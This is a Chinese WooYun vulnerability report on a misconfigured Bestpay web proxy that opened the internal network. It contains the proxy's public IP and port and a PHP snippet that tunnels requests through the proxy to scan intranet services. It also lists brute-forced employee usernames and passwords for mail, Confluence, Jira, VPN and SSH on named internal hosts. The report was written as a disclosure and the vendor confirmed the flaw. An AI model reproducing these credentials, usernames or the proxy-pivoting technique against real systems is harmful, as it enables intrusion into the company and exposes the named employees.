当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167887

漏洞标题:翼支付某webserver代理配置不当导致内网漫游(大量邮箱/VPN账号/内网服务器沦陷)

相关厂商:bestpay.com.cn

漏洞作者: 路人甲

提交时间:2016-01-06 18:18

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

翼支付某webserver代理配置不当导致内网漫游(大量邮箱/VPN账号/内网服务器沦陷)

详细说明:

http://bill.bestpay.com.cn:37006
webserver代理配置不当

Connection to 116.228.151.49 port 37010 [tcp/*] succeeded!
GET http://mail.bestpay.com.cn/ HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 05 Jan 2016 02:17:57 GMT
Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1g
Last-Modified: Thu, 12 Nov 2015 18:17:27 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 280
Cache-control: private
ETag: W/"MTAtODA4NS00ODI1N0RCRDAwNEU2NzIwLTAtMA=="
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">
<html>
<head>
<script language="JavaScript" type="text/javascript">
<!--
self._domino_name = "_Main";
// -->
</script>
</head>
<frameset>
<frame name="Main" src="/loadpage.nsf/MainForm?OpenForm">
</frameset>
</html>


写了个php小脚本去遍历内网的web服务

$ctx=array(
"http" => array(
'timeout' => 5,
'proxy' => 'tcp://116.228.151.49:37006',
'request_fulluri' => True,
),
"ssl"=>array(
'verify_peer'=>False,
),
);
$result = file_get_contents($url, False, stream_context_create($ctx));


http://172.17.16.52:8080/
http://172.17.16.9/templates/index/hrlogon.jsp
http://oa.bestpay.com.cn/loadpage.nsf?Open
http://172.17.16.7/
http://172.17.162.12:9080/ospweb/jsystem/common/login_login.do
http://172.17.16.52/redmine/
http://172.17.16.52:8090/
http://mail.bestpay.com.cn/names.nsf?Login
mail邮件系统爆破出几个弱口令邮箱

tanggang
dinghao
zhubin
chenjianglei
wuyuanxin
liuzh


http://172.17.16.52:8090/
Confluence系统弱口令:

sunpeijun
zhangjia
zhangzhijian
pengjunjie
libin
liwenchao
shenglei
luoping


密码为用户名+123
从Confluence系统得到一个员工用户名列表并发现邮件系统存在默认密码:abcd_123
二次爆破得到大量邮箱账号密码:

hejuan
hejuan
houyi
helong
xubin-zx
xujing-it
libing
liqin-it
xiaochou
xiaoxiong
zhanhua
zhaosong-it
dumeng
chenchen-it
taojin
leijing-zx
huangfei-it
houjinxin-zx ---
fengpeifeng-it
liuzhizhou
liushibing-it
huajiajie-zx
yeguojian-yy
yejinliang-it
lvyijun-yy
wulongwei
sunyuanxing-it
tugongxuan-it
zhangqinhua-it
zhangwenjun
zhangchangshuang-it
xubifeng
daiyuanyuan-it
wenzongjun
shiyanyong-it
zhufangfang-zx
lizheqi-zx
yangkexin-zx
liangchongda-it
tangmili
tangfangjian
wangyongsheng-it
qinhailiang
luoweisheng
hushaorui
hulingmin
fanyunlong-it
fanxuejian
fanminxiong
xiewengui
zhengxibin
guoqiankun
guoshuangwei-it
chenliufei
jinjiangyuan
hanyinlong-it
luojinmei-it
gaozhenhua-it


继续爆破:
jira弱口令:

yanshaowei
hetao
yanshaowei
hetao
liusha
yinjiangping
zhangchangjian
wenjihui
lichunan
limiao
dumiaodong
xionglei
xiaxiaowei
chenkehao
wuxiaoliang
wuchao
dubo
wenjunye
wangshushuang
tengmeifang
chenwenchao
chenwen 123456
luoping luoping123


然后是vpn
https://vpn.bestpay.com.cn

d3VjaGFv
dGFuZ3ll
ZHVtZW5n
aGV0YW8=
aGV0YW8=
bGl1emhpamlu
bGlhb3lpZnU=
emhhbmd5YW5n
emhhbmdsaXNoYW4=
eWFuZ2hvbmd5YW4=
aHVzaGFvcnVp
emhhb3lhbmc=
Z3V5dWppYW4=
Z2FvcWlhbmc=
ZGFpemh1b3dlaQ==
eWFuemhlbmd3ZWk=
ZGFpemh1b3dlaQ==
eWFuemhlbmd3ZWk=
bGl1c2h1YWk=
bGl1Y2hhbw==
c3VuaGFpbWluZw==
emhhbmdqdW4=
emhhbmd5dQ==
bGlsaW1pbmc=
bGluc2Fuamk=
d2FuZ2h1aQ==
Y2hlbmxpZ2VuZw==
Y2hlbnhpbnRvbmc=
Y2hlbm1pbmdqdW4=
Y2hlbmhvbmd4aWE=


base64解码后是vpn用户名,密码是abcd_123
liuchao Abcd_123
登陆vpn后收集内网信息对ssh进行爆破

ip:172.17.16.20 密码:passw0rd
ip:172.17.16.12 密码:passw0rd
ip:172.17.16.22 密码:passw0rd
ip:172.17.16.21 密码:passw0rd


四台内网机器沦陷两个oracle一个app的

漏洞证明:

屏幕快照 2016-01-06 下午5.44.00.png


屏幕快照 2016-01-06 下午5.44.59.png


屏幕快照 2016-01-06 下午5.45.24.png


屏幕快照 2016-01-06 下午5.45.57.png


屏幕快照 2016-01-06 下午5.53.53.png


屏幕快照 2016-01-06 下午6.01.13.png


屏幕快照 2016-01-06 下午6.02.46.png


屏幕快照 2016-01-06 下午6.03.10.png


屏幕快照 2016-01-06 下午6.03.39.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-08 08:52

厂商回复:

感谢对翼支付业务的关注,该问题的确存在,已安排人员进行修复。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-06 21:52 | rockes ( 实习白帽子 | Rank:38 漏洞数:17 | http://rocke.aliapp.com/)

    我知道你是谁,你是PX的!

  2. 2016-01-07 09:28 | 带我玩 ( 路人 | Rank:14 漏洞数:7 | 带我玩)

    我知道你是谁,你是PX的!